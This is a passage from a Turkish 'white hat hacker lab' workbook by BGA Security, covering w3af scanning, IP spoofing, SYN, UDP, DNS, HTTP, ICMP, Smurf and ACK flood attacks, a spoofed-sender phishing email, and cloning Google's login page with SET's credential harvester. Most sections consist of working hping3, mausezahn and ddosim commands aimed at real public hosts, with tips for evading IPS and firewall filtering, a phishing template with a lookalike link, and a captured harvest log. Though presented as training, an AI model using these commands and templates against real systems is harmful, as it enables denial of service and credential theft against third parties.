BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
5. Adım: Testasp.vulnweb.com üzerinde çeşitli web güvenlik zaafiyetleri içeren Acunetix firmasına ait bir
webuygulamasıdır.Üzerinde sql injection,xss,lfi vs.gibi güvenlikaçıklarıbulunabilir.
Uygulama No:BGA-PT-52
Uygulama Adı: W3Af Kullanarka Otomatize Güvenlik Testleri
Amaç: W3af kullanarakwebgüvenlikzaafiyetlerini otomatize olarakbulma.
KullanılanAraçlar:
W3af
Adımlar:
1.Adım: Aşağıda belirtilenyoldanbactracküzerindew3af uygulamasınaerişilebilir.
182.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
2.Adım: Target kısmına hedef web uygulaması yazılır sol taraftaki menüdende istenilen bir durum seçilir.
Biz örneğimizde OWASP tarafından belirlenen en üst sıradaki açıklıkların taranması için hazırlanan profili
seçtik.Dilersenizkendi profilinizide oluşturabilirsiniz.
183.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
3.Adım: Start diyerek taramayı başlatıyoruz. Ve discovering aşaması başlıyor. Burada web spider işlemi
gerçekleştirilir.
184.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
4.Adım: Log menüsü altından kırmızı ile işaretli bölümlerde yüksek seviye güvenlik açıklıklarını
görebilirsiniz.Aşağıdabulunanbirsql injection açıklığıgösterilmiştir.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Ek Kaynaklar:
DDoS Saldırıları LabUygulamaları
Uygulama No:BGA-PT-53
Uygulama Adı: Sahte IP Paketleri Oluşturma (IP Spoofing)
Amaç: GerçekIPadresimizi gizlemek
KullanılanAraçlar:
187.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
● Hping3
● Tcpdump
Adımlar:
1.Adım: Hping kullanarak belli bir IP adresinden geliyormuş gibi SYN bayrağı set edilmiş TCP paketleri
gönderme.
root@bt:~# hping3-S www.google.com-p80 --spoof5.5.5.5
HPINGwww.google.com(eth0173.194.70.105): S set,40 headers+ 0 data bytes
^C
--- www.google.comhping statistic---
10 packetstramitted,0 packetsreceived,100% packetloss
round-trip min/avg/max=0.0/0.0/0.0 ms
10 Paket gönderilmiş fakat hiç paket alınmamış. Dönen cevaplar 5.5.5.5 sahte IP’sine gittiği için alınan
paketsayısı 0 görünmektedir.
Aynı andatcpdumpçıktısına bakalım;
root@bt:~# tcpdump -nn-tt host 173.194.70.105
tcpdump:verboseoutputsuppressed,use -v or-vv forfull protocoldecode
listening on eth0, link-typeEN10MB (Ethernet),capturesize65535 bytes
1355672861.412878 IP 5.5.5.5.2282 > 173.194.70.105.80: Flags[S],seq 343886272, win 512, length 0
1355672862.413327 IP 5.5.5.5.2283 > 173.194.70.105.80: Flags[S],seq 1645756827, win 512, length 0
1355672863.413847 IP 5.5.5.5.2284 > 173.194.70.105.80: Flags[S],seq 777458050, win 512, length0
1355672864.415392 IP 5.5.5.5.2285 > 173.194.70.105.80: Flags[S],seq 343291324, win 512, length 0
Görüldüğü gibi 5.5.5.5 sahte IP’si source IP olmak üzere google.com sunucusuna SYN bayrakları set
edilmiş TCP paketleri gönderiliyor. Fakat sunucudan SYN ACK paketleri 5.5.5.5 IP adresine döndüğü için
bize doğrugelenbirpaketgörünmemektedir.Paketleryalnızcabizdençıkmaktadır.
2.Adım: Bir önceki adımda kullanılan –spoof yerine –a parametreside kullanılabilir. Bu parametreyi
kullanarak 10.10.10.10 IP adresinden gönderiliyormuş gibi bga.com.tr sunucusunun 80 portuna SYN
bayrağı setedilmişTCPpaketleri gönderelim.
root@bt:~# hping3-S www.bga.com.tr-p80 -a 10.10.10.10
HPINGwww.bga.com.tr(eth050.22.202.162): S set, 40 headers+ 0 data bytes
^C
188.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
--- www.bga.com.trhping statistic ---
5 packetstramitted,0 packetsreceived, 100% packetloss
round-trip min/avg/max=0.0/0.0/0.0 ms
10.10.10.10 IP adresi source olarak gösterilip 5 adet SYN paketi bga.com.tr sunucusuna gönderildi. Aynı
anda sonuçlartcpdumpile izleyelim:
root@bt:~# tcpdump -nn-tt host 50.22.202.162
tcpdump:verboseoutputsuppressed,use -v or-vv forfull protocoldecode
listening on eth0, link-typeEN10MB (Ethernet),capturesize65535 bytes
1355673342.646102 IP 10.10.10.10.1860 > 50.22.202.162.80: Flags [S], seq 768212028, win 512, length
0
1355673343.646539 IP 10.10.10.10.1861 > 50.22.202.162.80: Flags[S],seq 94327263, win 512, length 0
1355673344.647044 IP 10.10.10.10.1862 > 50.22.202.162.80: Flags [S], seq 601846840, win 512, length
0
1355673345.647364 IP 10.10.10.10.1863 > 50.22.202.162.80: Flags [S], seq 1564036185, win 512, length
0
1355673346.647934 IP 10.10.10.10.1864 > 50.22.202.162.80: Flags [S], seq 1061332838, win 512, length
0
^C
5 packetscaptured
5 packetsreceived by filter
0 packetsdropped by kernel
Görüldüğü gibi bizden çıkan paketler 10.10.10.10 IP adresinden gönderiliyormuş gibi hedefe gönderiliyor.
Ve dönüşpaketleri 10.10.10.10 IPadresine gittiği için tcpdumpçıktımızdagörünmemektedir.
Ek Kaynaklar:
---
Uygulama No:BGA-PT-54
Uygulama Adı: SYN Flood Saldırısı Gerçekleştirme
Amaç: Hedef sisteme yogun bir şekilde SYN bayrağı set edilmiş TCP paketleri gönderip SYN+ACK ile
cevap dönmesi ve bizden son ACK paketini almak için bekletilerek(bu paket hiç bir zaman gitmiyor)
sistemde mevcutsoketlerdoldurularaksisteminservisdışıbırakılması sağlanır.
KullanılanAraçlar:
● Hping3
● Mz
● Juno
189.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
● Netstat
Adımlar:
1.Adım: Hping3 ile gerçekIPadresindenSYN floodsaldırısıgerçekleştirelim.
root@bt:~# hping3-S bga.com.tr-p80 --flood
HPINGbga.com.tr(eth050.22.202.162): S set,40 headers+ 0 data bytes
hping in flood mode,no replies will be shown
--flood yerine –i u0 şeklinde bir parametrede kullanılabilir. Bu gönderilecek her paket arasında 0
mikrosaniye bekledemek.
2.Adım:Mz ile gerçekIP adresindenSYN Floodsaldırısıgerçekleştirelim;
root@bt:~# mz eth0 -c 0 -B 50.22.202.162 -ttcp "flags=syn,dp=80,sp=1-65535"
Mausezahn willsend framesinfinitly...
^C
Mausezahn cleansup...
3.Adım: Hpingile randomkaynakIP adreslerindenSYN floodsaldırısıgerçekleştirelim.
root@bt:~# hping3-S bga.com.tr-p80 --flood--rand-source
HPINGbga.com.tr(eth050.22.202.162): S set,40 headers+ 0 data bytes
hping in flood mode,no replies will be shown
4.Adım: Mz ile randomkaynakIPadresindenSYN floodsaldırısıgerçekleştirelim
root@bt:~# mz eth0 -c 0 -A rand-B 50.22.202.162 -t tcp "flags=syn,dp=80, sp=1-65535"
Mausezahn willsend framesinfinitly...
^C
Mausezahn cleansup...
5.Adım: Mz ile BotNet Simulasyonu gerçekleştirelim. Belirli IP Bloğundan(78.85.12.0/24) SYN Flood
Saldırısı gerçekleştirelim.
root@bt:~# mz eth0 -A 78.85.12.0/24 -B 50.22.202.162 -t tcp “flags=syn,dp=80, sp=1-65535” -c 0
190.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
6.Adım: Yapılan saldırınhedef sistemdekietkisini görmekiçinhedef sunucuüzerinde
netstat–ant komutuçalıştırılaraksonuçlarincelenebilir.BirçokSYN_RECV durumugörmenizgerekir.
Aynı saldırılarjuno.cisimli scriptile de gerçekleştirilebilir.
Ek Kaynaklar:
---
Uygulama No:BGA-PT-55
Uygulama Adı: UDP Flood Saldırısı
Amaç: Hedefe yoğunbirşekildeUDPpaketleri göndererekhedefin/uygulamanınservisdışıbırakılması
KullanılanAraçlar:
Hping
Mz
Adımlar:
1.Adım: Hping kullanarak google dns server’a(8.8.8.8) rastgele kaynak ip adreslerinden UDP flood
saldırısı gerçekleştirelim.
root@bt:~# hping3--udp8.8.8.8 -p 53 --flood--rand-source
191.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
HPING8.8.8.8 (eth08.8.8.8): udp modeset,28 headers+ 0 data bytes
hping in flood mode,no replies will be shown
2.Adım: Mz kullanarak google dns server’a(8.8.8.8) rastgele kaynak ip adreslerinden UDP flood saldırısı
gerçekleştirelim.
root@bt:~# mz eth0 -c 0 -A rand-B 8.8.8.8 -t udp dp=53
Mausezahn willsend frames infinitly...
^C
Mausezahn cleansup...
3.Adım: Çoğu IPS ve DDoS engelleme sistemi boş UDP paketlerini anormal paket olarak görür ve engeller.
Bu korumayöntemini atlatmakiçinUDPpaketlerininiçerisine veri ekleme yapılabilir.
GönderilenUDPpaketlerineveri eklemekiçinhping3ve mzyazılımlarıkullanılabilir.
Hpingkullanarakiçi doluUDP paketleri ile UDPfloodsaldırısıgerçekleştirelim;
root@bt:~# echo“BGADDoS Egitimi” >> bga-test.txt
root@bt:~# hping3--udp-p 500 192.168.1.1 -E bga-test.txt-d 50 --flood--rand-source
4.Adım: Mz kullanarakiçi doluUDPpaketleri ile UDPfloodsaldırısıgerçekleştirme;
root@bt:~# mz eth0 -c 0 -A rand-B 8.8.8.8 -t udp dp=53 -P"BGA DDOS eğitimi"
Mausezahn willsend framesinfinitly...
^C
Mausezahn cleans up...
---
Ek Kaynaklar:
Uygulama No:BGA-PT-56
Uygulama Adı: DNS Flood Saldırısı
Amaç: Hedef DNSserveryogunbirşekildednssorgularıgönderilerekservisdışıbırakmak
KullanılanAraçlar:
hping
Mz
192.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Adımlar:
1.Adım: Wireshark ile www.bga.com.tr websitesini ziyaret ederken isim çözümleme için yapılan DNS
sorgusunuseçipbinaryolaraktest_dnsismiyle kaydediyoruz.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
2.Adım: Elde edilen bu DNS sorgusu paketi hping ile DNS servera defalarca(flood saldırısı) sorularak DNS
servisinin/webuygulamasınınerişilemezhale gelmesisağlanır.
root@bt:~# hping3--udp8.8.8.8 -p 53 --flood--rand-source-d50 -E test_dns
HPING8.8.8.8 (eth08.8.8.8): udp modeset,28 headers+ 50 data bytes
[main] memlockall():Success
Warning:can't disablememory paging!
hping in flood mode,no replies will be shown
195.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
3.Adım: Mz kullanarak bga.com.tr sunucusunun DNS serverina blog.bga.com.tr domainini rastgele
kaynakipadreslerindengeliyormuşgibi floodsaldırısıyaparaksorgulatalım
root@bt:~/Desktop# mz eth0 -c 0 -A rand -B dns-eu1.powerdns.net-tdns "q=blog.bga.com.tr"
Mausezahn willsend framesinfinitly...
Ek Kaynaklar:
---
Uygulama No:BGA-PT-57
Uygulama Adı: HTTP Get/Post Flood DoS Saldırısı
Amaç: Hedef webuygulamasının(bazenaradaki cihazlar,bazenveritabanları) servisdışıbırakılması.
KullanılanAraçlar:
OwaspHttp PostTool
Ab
Ddosim
Adımlar:
1.Adım: OwaspHTTP POST Tool ile Http GET Floodsaldırısı yapma;
196.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Burada connection rate saniyede gönderilecek http get adedidir. Bu Alana 1000 veya daha büyük bir
değeryazarsaksaniyede gönderebildiği kadarçokhttpget talebinde bulunacaktır.
197.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Detaylıbirşekilde gönderilenpaketleri görebilirsiniz.
2.Adım: OwaspHTTP POST Tool ile Http POSTFloodsaldırısı yapma;
198.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
3.Adım: Ab(apache benchmark) ile facebook.com web sunucusuna toplam 15 tane(-n) HTTP GET
talebinde bulunalım.Güvenlikcihazlarınatakılmamakiçineşzamanlıisteksayısı(-c) 1olarakseçildi.
root@bt:~/Desktop#ab -n 15 -c 1 -v -rhttp://www.facebook.com/
This is ApacheBench,Version 2.3 <$Revision: 655654 $>
Copyright1996 AdamTwiss,ZeusTechnology Ltd,http://www.zeustech.net/
Licensed to The ApacheSoftwareFoundation,http://www.apache.org/
Benchmarking www.facebook.com(bepatient).....done
Server Software:
Server Hostname: www.facebook.com
Server Port: 80
199.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
DocumentPath: /
DocumentLength: 0 bytes
Concurrency Level: 1
Time taken for tests: 13.149 seconds
Completerequests: 15
Failedrequests: 0
Write errors: 0
Non-2xx responses: 15
Total transferred: 3480 bytes
HTML transferred: 0 bytes
Requestsper second: 1.14 [#/sec] (mean)
Time per request: 876.619 [ms] (mean)
Time per request: 876.619 [ms] (mean,acrossallconcurrentrequests)
Transferrate: 0.26 [Kbytes/sec] received
Connection Times(ms)
min mean[+/-sd]median max
Connect: 87 390 202.0 449 709
Processing: 238 486 142.1 516 719
Waiting: 238 486 142.1 516 719
Total: 334 877 316.0 981 1315
Percentageof the requestsserved within a certain time (ms)
50% 948
66% 1049
75% 1093
80% 1145
90% 1262
95% 1315
98% 1315
99% 1315
100% 1315 (longestrequest)
4.Adım: Ddosim ile tek makinadan zombie simulasyonu yaparak farklı ip adreslerinden (78.68.45.0/24)
geliyormuşgibi hedefe (52.16.44.2) HTTP GET floodsaldırısı yapma;
root@bt:~/Desktop/ddosim-0.2# ./ddosim -d 52.16.44.2 -p 80 –k 78.68.45.0 -c 0 -w 0 -t 10 -
r HTTP_VALID -i eth0
Ek Kaynaklar:
200.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Uygulama No:BGA-PT-58
Uygulama Adı: ICMP Smurf DDoS Saldırısı
Amaç: Hedef sistemin ip adresi spoof edilerek belirli broadcast IP adreslerine icmp flood başlatarak
dönen cevapların kurban makinanın ip adresine saldırması. Günümüz sistemlerinde broadcast IP
adresine yapılanisteklere cevapverilmediği içingünümüzdekullnımıbaşarılıolmamaktadır.
KullanılanAraçlar:
Adımlar:
1.Adım: Hpingile bga.com.trwebsunucusunaICMPSmurf saldırısı gerçekleştirme;
root@bt:~/Desktop# hping3–icmp –flood–a 50.22.202.162 85.123.255.255
HPING85.123.255.255 (eth085.123.255.255): icmp modeset, 28 headers+ 0 data bytes
hping in flood mode,no replies will be shown
^C
--- 85.123.255.255 hping statistic ---
274266 packetstramitted,0 packetsreceived, 100% packetloss
round-trip min/avg/max=0.0/0.0/0.0 ms
root@bt:~/Desktop#
Burada yapılan bga.com.tr IP adresinden(50.22.202.162) geliyormuş gibi 85.123.255.255 şeklindeki bir
/16 subnet broadcast IP adresine icmp paketleri göndermek ve dönecek icmp cevapları ile bga.com.tr
suncusunafloodsaldırısıgerçekleştirmek.
Ek Kaynaklar:
----
UygulamaNo:BGA-PT-59
Uygulama Adı: ICMP Flood DDoS Saldırısı
Amaç: Hedefe yoğunbirşekildeIcmprequestlergönderilerekhedefinservisdışıbırakılması.
KullanılanAraçlar:
Hping
Wireshark
Tcpdump
Adımlar:
1.Adım : Hping ile gerçek IP adresimizden networkpentest.net web sunucusuna 1 saniyede 10 icmp
talebinde bulunalım. Aşağıda görüldüğü gibi cevapları bize döndüğünü görebilmekteyiz. Aynı istekleri
201.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
random kaynak IP adreslerinden yapsaydık icmp cevapları o IP adreslerine dönüleceği için
görüntülenemeyecekti.
root@bt:~/Desktop# hping3--icmpnetworkpentest.net -i u10000
HPINGgoogle.com(eth0173.194.35.4): icmp modeset,28 headers+ 0 data bytes
len=46 ip=173.194.35.4 ttl=53 id=789 icmp_seq=0 rtt=98.7 ms
len=46 ip=173.194.35.4 ttl=54 id=790 icmp_seq=1 rtt=93.2 ms
len=46 ip=173.194.35.4 ttl=54 id=791 icmp_seq=2 rtt=90.3 ms
len=46 ip=173.194.35.4 ttl=53 id=792 icmp_seq=3 rtt=99.0 ms
len=46 ip=173.194.35.4 ttl=54 id=793 icmp_seq=4 rtt=98.7 ms
len=46 ip=173.194.35.4 ttl=54 id=794 icmp_seq=5 rtt=98.6 ms
len=46 ip=173.194.35.4 ttl=53 id=795 icmp_seq=6 rtt=102.1 ms
2.Adım: Hping ile rastgele IP adreslerinden networkpentest.net sunucusuna icmp flood saldırısı
gerçekleştirelim.
root@bt:~/Desktop# hping3--icmpnetworkpentest.net --flood--rand-source
HPINGnetworkpentest.net(eth0216.239.32.21): icmp modeset,28 headers+ 0 data bytes
hping in flood mode,no replies will be shown
^C
--- networkpentest.nethping statistic ---
39478 packetstramitted,0 packetsreceived,100% packet loss
round-trip min/avg/max=0.0/0.0/0.0 ms
3.Adım: Bazı sistemler hping tarafından üretilen icmp paketlerini tanır ve otomatik olarak drop eder.
Bunu atlatmak için normal bir ping komutu ile normal bir icmp request gerçekleştirilip wireshark ile bu
talep binary olarak kaydedilip data olarak hping’e aşağıdaki gibi verilerek ilgili güvenlik duvarları bypass
edilerekicmpfloodsaldırıyapılabilir.
Normal pingbaşlatalım:
root@bt:~/Desktop# pingnetworkpentest.net
PINGnetworkpentest.net(216.239.34.21) 56(84) bytesof data.
64 bytesfromany-in-2215.1e100.net (216.239.34.21): icmp_seq=1 ttl=45 time=96.8 ms
64 bytesfromany-in-2215.1e100.net (216.239.34.21): icmp_seq=2 ttl=45 time=146 ms
Aynı andawiresharkile izleyelimve ilgiliicmppaketini kaydedelim:
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Şimdi ise bu kaydettiğimiz icmp request paketini data olarak hping aracına verelim ve aynı formatta
üretilmiş icmp paketleri ile networkpentest.net web sunucusuna random source ip adreslerinden icmp
floodsaldırısıyapalım.Paketlerrandomsource’lardanyapıldığıiçinalınanpaketsayısı0 görünmekte.
root@bt:~/Desktop# hping3 --rand-source -E test_icmp -d 56 -n -q --flood networkpentest.net –rawip –
ipproto1
HPINGnetworkpentest.net(eth0216.239.34.21): NOFLAGS are set,40 headers+ 100 data bytes
[main] memlockall():Success
Warning:can't disablememory paging!
hping in flood mode,no replies will be shown
^C
--- networkpentest.nethping statistic ---
121944 packetstramitted,0 packetsreceived, 100% packetloss
round-trip min/avg/max=0.0/0.0/0.0 ms
Saldırıyı tcpdump ile izliyelim ve data payloadlarının hep aynı olduğunu ve random kaynaklardan
gönderildiğini görelim;
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Amaç: Hedef sistemin(aradaki sistemlerin) servisdışıbırakılması.
KullanılanAraçlar:
Hping
Mz
Adımlar:
1.Adım: Hpingile TCPSYN/ACKflood saldırısıyapmak.
root@bt:~# hping3-SA bga.com.tr-p80 --rand-source--flood
HPINGbga.com.tr(eth050.22.202.162): SA set, 40 headers+ 0 data bytes
hping in flood mode,no replies will be shown
^C
--- bga.com.trhping statistic---
21601 packetstramitted,0 packetsreceived,100% packet loss
round-trip min/avg/max=0.0/0.0/0.0 ms
2.Adım: Hpingile FIN/ACKflood saldırısıyapma;
root@bt:~# hping3-FAbga.com.tr -p80 --rand-source--flood
HPINGbga.com.tr(eth050.22.202.162): FA set, 40 headers+ 0 data bytes
hping in flood mode,no replies will be shown
^C
--- bga.com.trhping statistic---
172601 packetstramitted,0 packetsreceived, 100% packetloss
round-trip min/avg/max=0.0/0.0/0.0 ms
3.Adım:Mz ile SYN/ACKfloodsaldısıyapma;
root@bt:~# mz eth0 -A rand -B 50.22.202.162 -t tcp flags=ack+syn -c 0
Mausezahn willsend framesinfinitly...
^C
Mausezahn cleansup...
4.Adım: Mz ile FIN/ACKfloodsaldırısıyapma;
root@bt:~# mz eth0 -A rand -B 50.22.202.162 -t tcp flags=fin+ack-c 0
Mausezahn willsend framesinfinitly...
^C
Mausezahn cleansup...
Bu komutlar tek local makinadan spoof edilen ipler ile hedefe SYN+ACK bayrakları set edilmiş TCP flood
saldırısı yapılmıştır. Temelde DOS saldırısıdır fakat DDOS etkisi için spoof edilmiştir. Bu komut birden
fazlasistemde koşturulursagerçekbirDDOSetkisi oluşacaktır.
206.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Ek Kaynaklar:
Sosyal Mühendislik
Uygulama No:BGA-PT-61
Uygulama Adı: Kuruma Ait E-posta Adreslerini Kullanarak Posta Gönderimi
Amaç: İstenilenbirdomainuzantısındanistenilenkişiye mail gönderme.
KullanılanAraçlar:
Html
Bga_mail.py
Adımlar:
1.Adım: Hangi mail adresinden kime hangi başlıkla mail gönderileceğimizi aşağıdaki formatta bir
kisiler.txtolarak kaydediyoruz.
info@facebook.com:Facebook updated:facebookcalisanıkurban@facebook.com
2.Adım: Mail atmakiçinsmtp konfigrasyonumuzubirconfig.txtdosyasınayazıyoruz.
[mail]
domain =facebook.com
[smtp]
server =34.5.145.34
time = 2
3.Adım: Html formatında arkdaşlıkmailimizaşağıdaki gibi hazırlayıpsahte_mail olarakkaydediyourz.
Hi,
<p>
Facebookservicesupdated.Pleaselogin below mail and start.
</p>
<b>
<a href="http:// www.facebook.com.t.com">login new facebook</a>
207.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
</b>
<br/>
<br/>
<br/>
Facebookhuman resource…
<br/>
<br/>
3.Adım: Aşağıdaki bga pentestekibitarafındngeliştirilenbga_mail pythonscriptini çalıştırıyoruz.
root@bt:~/Desktop/bga_mail#pythonbga_mail.py -nsahte_mail -cconfig.txt-fkisiler.txt
Ek Kaynaklar:
E-postabaşlıkanalizi
---
UygulamaNo:BGA-PT-62
Uygulama Adı: SET Kullanarak Phishing Amaçlı Web Sayfası Kopyalama
Amaç: Kopyawebsayfalarıoluşturarakkullanıcılarayönelikoltalamasaldırısıyapma.
KullanılanAraçlar:
SET
Adımlar:
1.Adım: Social EngineeringToolset(SET) başlatma;
root@bt:~# cd /pentest/exploits/set/
root@bt:/pentest/exploits/set#./set
[-] Newset_config.py filegenerated on:2012-12-16 11:43:40.360516
[-] Verifying configuration update...
[*] Updateverified,config timestamp is:2012-12-16 11:43:40.360516
[*] SET is using the newconfig,no need to restart
Copyright2012, The Social-EngineerToolkit(SET) by TrustedSec,LLC
All rightsreserved.
2.Adım: İlgili adımlaraşağıdaki gibi takipedilir;
208.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Welcome to the Social-EngineerToolkit(SET).Your one
stop shop forall of yoursocial-engineering needs..
Join us on irc.freenode.netin channel#setoolkit
The Social-EngineerToolkitis a productof TrustedSec.
Visit: https://www.trustedsec.com
Select fromthemenu:
1) Social-Engineering Attacks
2) Fast-TrackPenetration Testing
3) Third PartyModules
4) UpdatetheMetasploitFramework
5) UpdatetheSocial-EngineerToolkit
6) UpdateSET configuration
7) Help, Credits,and About
99) Exit the Social-EngineerToolkit
set> 1
[---] The Social-EngineerToolkit(SET) [---]
[---] Created by:David Kennedy (ReL1K) [---]
[---] DevelopmentTeam:JR DePre (pr1me) [---]
[---] DevelopmentTeam:Joey Furr (j0fer) [---]
[---] DevelopmentTeam:ThomasWerth [---]
[---] Version:4.2.1 [---]
[---] Codename:'BagelsBagelsBagels' [---]
[---] Reportbugs:davek@trustedsec.com [---]
[---] Followus on Twitter: @trustedsec [---]
[---] Followme on Twitter: @dave_rel1k [---]
[---] Homepage:https://www.trustedsec.com [---]
Welcome to the Social-EngineerToolkit(SET).Yourone
stop shop forall of yoursocial-engineering needs..
Join us on irc.freenode.netin channel#setoolkit
The Social-EngineerToolkitis a productof TrustedSec.
209.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Visit: https://www.trustedsec.com
Select fromthemenu:
1) Spear-Phishing AttackVectors
2) Website AttackVectors
3) InfectiousMedia Generator
4) Create a Payload and Listener
5) MassMailer Attack
6) Arduino-Based AttackVector
7) SMSSpoofing AttackVector
8) Wireless AccessPointAttackVector
9) QRCodeGeneratorAttackVector
10) PowershellAttackVectors
11) Third PartyModules
99) Return backto themain menu.
set> 2
The Web Attackmoduleis a uniqueway of utilizing multiple web-based attacks
in orderto compromisetheintended victim.
….
….
The Multi-Attackmethod will add a combination of attacksthrough theweb attack
menu.For exampleyou can utilize theJava Applet,MetasploitBrowser,
Credential Harvester/Tabnabbing,and theMan Leftin the Middleattack
all at onceto see which is successful.
1) Java AppletAttackMethod
2) MetasploitBrowserExploit Method
3) CredentialHarvester AttackMethod
4) Tabnabbing AttackMethod
5) Man Left in the Middle AttackMethod
6) Web Jacking AttackMethod
7) Multi-AttackWeb Method
8) Victim Web Profiler
9) Create or importa CodeSigning Certificate
99) Return to Main Menu
210.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
set:webattack>3
The first method will allowSET to importa list of pre-defined web
applicationsthatit can utilize within the attack.
The second method will completely clone a websiteof yourchoosing
and allow you to utilize the attackvectorswithin the completely
same web application you wereattempting to clone.
The third method allowsyou to importyourown website,notethatyou
should only havean index.htmlwhen using theimportwebsite
functionality.
1) Web Templates
2) Site Cloner
3) CustomImport
99) Return to WebattackMenu
set:webattack>2
[-] Credentialharvesterwill allowyou to utilize theclone capabilities within SET
[-] to harvestcredentialsor parametersfroma websiteas well as place theminto a report
[-] This option is used for whatIPthe serverwill POST to.
[-] If you're using an externalIP,use yourexternalIP forthis
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.1.102
[-] SET supportsbothHTTPand HTTPS
[-] Example:http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://accounts.google.com/
[*] Cloning thewebsite: https://accounts.google.com/
[*] This could take a little bit...
The best way to use this attackis if usernameand password form
fields are available.Regardless,thiscapturesall POSTson a website.
[*] Social-EngineerToolkitCredentialHarvester Attack
[*] CredentialHarvesteris running on port80
[*] Information willbe displayed to you asit arrivesbelow:
[*] Lookslike the web_servercan't bind to 80. Are you running Apache?
Do you want to attempt to disableApache?[y/n]:y
* Stopping web serverapache2 ... waiting
[ OK]
211.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
[*] Successfully stopped Apache.Starting thecredentialharvester.
[*] Harvesteris ready,havevictim browseto yoursite.
Bu bölümde pusuda bekliyoruz. Ve sahte adresimizi ( http://192.168.1.102/ ) kurbanın ziyaret etmesini
bekliyoruz. Şayet ziyeret eder kullanıcı adı parolasını girip bağlanmak isterse kullanıcı adı ve parola bilgisi
ekranımızadüşecektir.
3. Adım: Şimdi http://192.168.1.102/ adresini ziyaret edelim ve login olmaya çalışalım.İlk login
girişiminde kullanıcı hesap bilgileri alındıktan sonra gerçek gmail sayfası açılır tekrar kullanıcı adı şifre
girilmesi sağlanır.
212.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
4.Adım: Yapılan logingirişimlerive elde edilenkullanıcıadıparolaları görebilirsiniz.
192.168.1.102 - - [16/Dec/2012 12:02:56] "GET/ HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing theoutput:
PARAM:continue=https://accounts.google.com/ManageAccount
PARAM:followup=https://accounts.google.com/ManageAccount
PARAM:dsh=8660079690478144308
PARAM:GALX=R4cvRorUrK4
PARAM:pstMsg=1
PARAM:dnConn=
PARAM:checkConnection=
PARAM:checkedDomains=youtube
